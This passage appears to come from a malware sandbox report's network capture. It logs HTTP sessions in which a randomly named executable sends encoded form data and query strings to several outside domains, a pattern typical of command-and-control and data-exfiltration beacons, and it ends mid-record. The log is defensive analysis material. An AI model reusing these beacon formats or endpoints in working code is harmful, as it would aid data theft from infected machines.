                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opOdraW5LOYQ3NHpUDHNro4LbHQixwcSxXkr4DPgWnPxWth80TmMbm0GPnLqAfh5GWitHcy8%2B0kHdIaZ77PVDbqln1Ak%2FtN1OoE1eQYZmeE1aCniafmzicjrYE2W9Aat"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c736a280981432b-EWR
                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.649777188.114.97.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:11.090127945 CEST417OUTGET /4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.cc101.pro
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:44:13.085714102 CEST1236INHTTP/1.1 200 OK
                                                                Date: Sun, 22 Sep 2024 15:44:13 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Wed, 18 Sep 2024 08:27:45 GMT
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dH4sBb%2FAHaUEOfIV6Fyv7HelnnUk4uGyEHoNQ6AIosRL4yA%2FutTHT5%2FF9x8XOpE51JBRZolb8O47KO0AC2A%2F7Lv%2FPfQJJ8wKYQy16ubB2PP2WImsqGJ9lvvr4WExGjfW"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                Server: cloudflare
                                                                CF-RAY: 8c736a37cf847d18-EWR
                                                                Data Raw: 65 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                                Data Ascii: e6e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:
                                                                Sep 22, 2024 17:44:13.085736990 CEST1236INData Raw: 35 30 25 3b 22 3e 3c 2f 63 61 6e 76 61 73 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 31 31 70 78 20 20 30 20 32 30 70 78 22 3e
                                                                Data Ascii: 50%;"></canvas><div style="color: #242424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</
                                                                Sep 22, 2024 17:44:13.085755110 CEST1236INData Raw: 73 61 76 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 74 72 61 6e 73 6c 61 74 65 28 72 61 73 2c 20 72 61 73 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 62 65 67 69 6e
                                                                Data Ascii: save(); ctx.translate(ras, ras); ctx.beginPath(); ctx.lineWidth = ras * 0.08; ctx.strokeStyle = "#d1d2d4"; ctx.arc(0, 0, ras * 0.8, 0, Math.PI
                                                                Sep 22, 2024 17:44:13.085773945 CEST637INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 74 6e 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72
                                                                Data Ascii: } ; btn.style.background = '#36A11E' } else if (index > 60) { index += 1 } else {


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.64977881.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:18.172374964 CEST695OUTPOST /bf6k/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.asociacia.online
                                                                Origin: http://www.asociacia.online
                                                                Referer: http://www.asociacia.online/bf6k/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 62 6b 47 75 57 45 65 43 66 6e 71 62 6e 4b 36 68 47 68 37 6c 77 76 43 66 61 59 31 38 30 32 47 74 4a 57 68 31 75 36 44 2f 4e 51 65 57 79 48 74 4b 64 38 68 6d 35 57 58 59 61 66 4f 64 6e 71 6c 48 35 30 6c 67 69 53 2b 6a 50 56 6c 73 2f 68 4b 64 7a 51 63 6b 52 71 33 75 6a 2b 52 38 50 61 70 74 67 52 56 36 38 52 38 4a 4e 59 66 55 77 30 33 6d 74 35 2b 37 55 77 70 30 76 53 4b 7a 30 38 58 55 7a 49 44 66 39 77 6b 75 6f 35 4d 30 59 62 2b 6c 38 61 7a 6a 4a 4d 35 6c 4c 4e 44 64 55 74 66 56 4d 64 57 69 39 37 4a 58 2b 62 4b 65 58 65 77 34 37 72 32 69 67 73 76 42 2f 42 76 79 67 78 44 56 68 6d 79 34 79 38 6d 77 6c 44 43 67
                                                                Data Ascii: i4fTbV=bkGuWEeCfnqbnK6hGh7lwvCfaY1802GtJWh1u6D/NQeWyHtKd8hm5WXYafOdnqlH50lgiS+jPVls/hKdzQckRq3uj+R8PaptgRV68R8JNYfUw03mt5+7Uwp0vSKz08XUzIDf9wkuo5M0Yb+l8azjJM5lLNDdUtfVMdWi97JX+bKeXew47r2igsvB/BvygxDVhmy4y8mwlDCg
                                                                Sep 22, 2024 17:44:18.834770918 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:18 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.64977981.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:20.717183113 CEST719OUTPOST /bf6k/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.asociacia.online
                                                                Origin: http://www.asociacia.online
                                                                Referer: http://www.asociacia.online/bf6k/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 62 6b 47 75 57 45 65 43 66 6e 71 62 6d 70 53 68 4b 69 54 6c 79 50 43 63 45 49 31 38 39 57 47 68 4a 58 64 31 75 37 47 79 4b 6d 47 57 78 6d 64 4b 63 39 68 6d 38 57 58 59 53 2f 4f 63 36 61 6c 4d 35 30 34 56 69 54 43 6a 50 56 68 73 2f 67 36 64 77 68 63 6a 52 36 33 73 33 4f 52 2b 42 36 70 74 67 52 56 36 38 52 6f 6a 4e 59 48 55 78 46 48 6d 75 59 2b 34 63 51 70 33 2f 69 4b 7a 6c 4d 58 51 7a 49 44 78 39 78 6f 41 6f 37 45 30 59 5a 6d 6c 39 4a 72 67 51 38 35 6a 57 64 44 4e 61 64 79 71 49 75 6e 67 69 6f 5a 70 2b 72 69 6a 62 49 78 69 6e 59 32 42 79 38 50 44 2f 44 33 41 67 52 44 2f 6a 6d 4b 34 67 72 71 58 71 33 6e 44 7a 54 7a 45 55 4c 42 32 4a 75 69 67 55 70 68 75 72 65 77 31 52 77 3d 3d
                                                                Data Ascii: i4fTbV=bkGuWEeCfnqbmpShKiTlyPCcEI189WGhJXd1u7GyKmGWxmdKc9hm8WXYS/Oc6alM504ViTCjPVhs/g6dwhcjR63s3OR+B6ptgRV68RojNYHUxFHmuY+4cQp3/iKzlMXQzIDx9xoAo7E0YZml9JrgQ85jWdDNadyqIungioZp+rijbIxinY2By8PD/D3AgRD/jmK4grqXq3nDzTzEULB2JuigUphurew1Rw==
                                                                Sep 22, 2024 17:44:21.376269102 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:21 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.64978081.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:23.255611897 CEST1732OUTPOST /bf6k/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.asociacia.online
                                                                Origin: http://www.asociacia.online
                                                                Referer: http://www.asociacia.online/bf6k/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 62 6b 47 75 57 45 65 43 66 6e 71 62 6d 70 53 68 4b 69 54 6c 79 50 43 63 45 49 31 38 39 57 47 68 4a 58 64 31 75 37 47 79 4b 6d 4f 57 79 55 56 4b 61 65 5a 6d 2f 57 58 59 59 66 4f 42 36 61 6c 56 35 30 77 52 69 54 50 63 50 58 70 73 39 47 75 64 34 7a 6b 6a 43 61 33 73 31 4f 52 39 50 61 70 34 67 52 46 32 38 52 34 6a 4e 59 48 55 78 47 50 6d 36 35 2b 34 61 51 70 30 76 53 4b 33 30 38 58 6f 7a 49 62 48 39 78 38 2b 70 50 77 30 59 35 32 6c 77 62 7a 67 5a 38 35 68 56 64 43 53 61 64 2b 4c 49 75 37 61 69 70 64 48 2b 73 53 6a 65 74 51 68 31 70 36 73 68 75 58 39 69 77 65 72 74 31 48 54 6b 55 47 66 6b 70 2b 66 6c 31 4c 66 30 47 72 48 65 71 73 68 47 76 6a 4d 55 38 6f 70 6f 4e 70 53 43 50 66 59 66 4d 6d 79 61 53 43 31 6c 30 49 57 33 4c 37 49 50 4b 62 61 6a 42 63 4a 6b 58 54 6a 59 51 57 73 55 36 6c 73 6e 73 79 48 44 71 58 4d 59 68 49 65 78 7a 59 57 72 63 58 52 47 39 65 71 35 4c 4a 2b 70 46 65 4d 51 37 6c 71 6f 6a 77 69 38 6a 6f 52 56 45 48 6d 6f 36 4a 32 32 33 46 7a 53 59 6e 32 56 65 66 2f 66 78 36 [TRUNCATED]
                                                                Data Ascii: i4fTbV=bkGuWEeCfnqbmpShKiTlyPCcEI189WGhJXd1u7GyKmOWyUVKaeZm/WXYYfOB6alV50wRiTPcPXps9Gud4zkjCa3s1OR9Pap4gRF28R4jNYHUxGPm65+4aQp0vSK308XozIbH9x8+pPw0Y52lwbzgZ85hVdCSad+LIu7aipdH+sSjetQh1p6shuX9iwert1HTkUGfkp+fl1Lf0GrHeqshGvjMU8opoNpSCPfYfMmyaSC1l0IW3L7IPKbajBcJkXTjYQWsU6lsnsyHDqXMYhIexzYWrcXRG9eq5LJ+pFeMQ7lqojwi8joRVEHmo6J223FzSYn2Vef/fx6XvOMRJc+u3tTwVDC6UX/CDUewdnRS0ZeoHLrL0OajvesyDKEbbVcS1S4GuFH3fpb8w4CGeYyZDP+CuAoH7+3Vh24iQmxDLAMoF/9XgloQWpswIeElIix8OSLzqBzOar4CqQ9CRbhCVC9HZ9Ek7UpopWMgznH3Y5wlKqBFJw+s0tY7F4Djys05ZrGxcylmY43QdfE5PEq55N4G1gV/eG+W3LTwjSwxIOgcOB4oWwnLCtaxOz/ajh/lNS69gmfs1qZYNmK7QDHzlQyO1MZwS5Kl8AiXVPwQi39JvghfDfddHgF2Nwvr0lBuaFqea6gXvMqf2ePifXPQQVjfLf3xwE3AoEYPpMi2ifYwvSJm435f9F9RHAcGfJg4mFHndW/GjSm5cGo7EVPKfGqHaySrpUxWUDEQnIbDONflxlq4RxE622Pgi8Y0OH7WXWHGjX9hVyUiAa/NFsw0BS8m0C15GRTqd5lwDKEPLaVHYDJnEZq73XJJjWfcM/mtoERG9iv3JgCOOtTiu2/duUXEAw0FUdB2aj3VeLHdp/xeM/tXQqtYcy9sJyouzJJghMuIdUvzyB/0yEkPM65MH8SNg5bvd7eIJ/KDlpSYWJozIS6FwDQha2Gdy99+5fa2Nc7rqBUmWkqxRymQqnzxqjNX7Xw/vMaF+eyUsvjkygKwL [TRUNCATED]
                                                                Sep 22, 2024 17:44:23.911545038 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:23 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.64978181.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:25.798013926 CEST424OUTGET /bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.asociacia.online
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:44:26.464677095 CEST691INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:26 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.649782142.250.185.115804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:31.541647911 CEST683OUTPOST /1y6y/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.deefbank.net
                                                                Origin: http://www.deefbank.net
                                                                Referer: http://www.deefbank.net/1y6y/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 55 62 71 51 77 69 2b 6c 48 6c 61 2b 73 4b 62 70 38 64 34 58 4d 62 6a 6b 4e 43 51 50 79 33 38 74 4f 4d 67 39 6e 2f 31 57 70 41 48 48 64 4e 47 55 4f 4c 46 6d 73 64 39 6c 6b 6b 42 74 5a 4c 59 72 76 38 68 62 51 52 63 50 76 4c 30 59 6a 47 35 46 78 50 64 54 44 2f 45 6d 39 75 70 51 7a 74 76 78 59 6a 48 7a 53 46 42 4b 41 59 36 42 64 7a 4b 68 6d 4a 7a 69 6f 77 42 52 6c 36 6f 4a 53 62 59 4c 79 38 4e 71 4b 39 31 44 4c 4f 75 35 77 30 48 4d 34 59 74 36 66 50 53 4f 43 74 69 73 48 59 6e 44 6b 79 65 70 35 48 6e 69 65 71 39 42 39 79 6a 64 44 42 6b 56 64 77 49 30 73 61 4e 4b 6b 55 75 32 6f 75 51 73 4c 48 65 53 46 4f 30 48
                                                                Data Ascii: i4fTbV=UbqQwi+lHla+sKbp8d4XMbjkNCQPy38tOMg9n/1WpAHHdNGUOLFmsd9lkkBtZLYrv8hbQRcPvL0YjG5FxPdTD/Em9upQztvxYjHzSFBKAY6BdzKhmJziowBRl6oJSbYLy8NqK91DLOu5w0HM4Yt6fPSOCtisHYnDkyep5Hnieq9B9yjdDBkVdwI0saNKkUu2ouQsLHeSFO0H
                                                                Sep 22, 2024 17:44:32.248075962 CEST402INHTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:32 GMT
                                                                Location: https://www.deefbank.net/1y6y/
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.649783142.250.185.115804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:34.086030006 CEST707OUTPOST /1y6y/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.deefbank.net
                                                                Origin: http://www.deefbank.net
                                                                Referer: http://www.deefbank.net/1y6y/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 55 62 71 51 77 69 2b 6c 48 6c 61 2b 2b 62 4c 70 2b 2b 51 58 64 37 6a 6e 43 69 51 50 70 48 38 70 4f 4d 73 39 6e 39 5a 47 70 31 76 48 63 70 43 55 50 50 52 6d 76 64 39 6c 73 45 42 6f 45 62 59 67 76 39 64 74 51 54 49 50 76 4c 77 59 6a 48 4a 46 78 63 31 51 43 76 45 6b 31 4f 70 53 33 74 76 78 59 6a 48 7a 53 46 6c 73 41 62 4b 42 63 44 36 68 6e 74 6e 68 72 77 42 4f 69 36 6f 4a 45 72 59 31 79 38 4e 79 4b 38 70 74 4c 4c 69 35 77 30 58 4d 37 4b 46 39 4b 2f 53 45 63 64 6a 6b 58 70 47 63 75 42 69 73 37 6c 44 6e 64 35 74 31 38 45 69 48 66 79 6b 32 50 67 6f 32 73 59 56 34 6b 30 75 63 71 75 6f 73 5a 51 53 31 4b 36 52 6b 57 31 6f 38 70 34 78 62 69 54 4b 41 76 2f 66 4b 51 4d 65 4b 4c 67 3d 3d
                                                                Data Ascii: i4fTbV=UbqQwi+lHla++bLp++QXd7jnCiQPpH8pOMs9n9ZGp1vHcpCUPPRmvd9lsEBoEbYgv9dtQTIPvLwYjHJFxc1QCvEk1OpS3tvxYjHzSFlsAbKBcD6hntnhrwBOi6oJErY1y8NyK8ptLLi5w0XM7KF9K/SEcdjkXpGcuBis7lDnd5t18EiHfyk2Pgo2sYV4k0ucquosZQS1K6RkW1o8p4xbiTKAv/fKQMeKLg==
                                                                Sep 22, 2024 17:44:34.898056984 CEST402INHTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:34 GMT
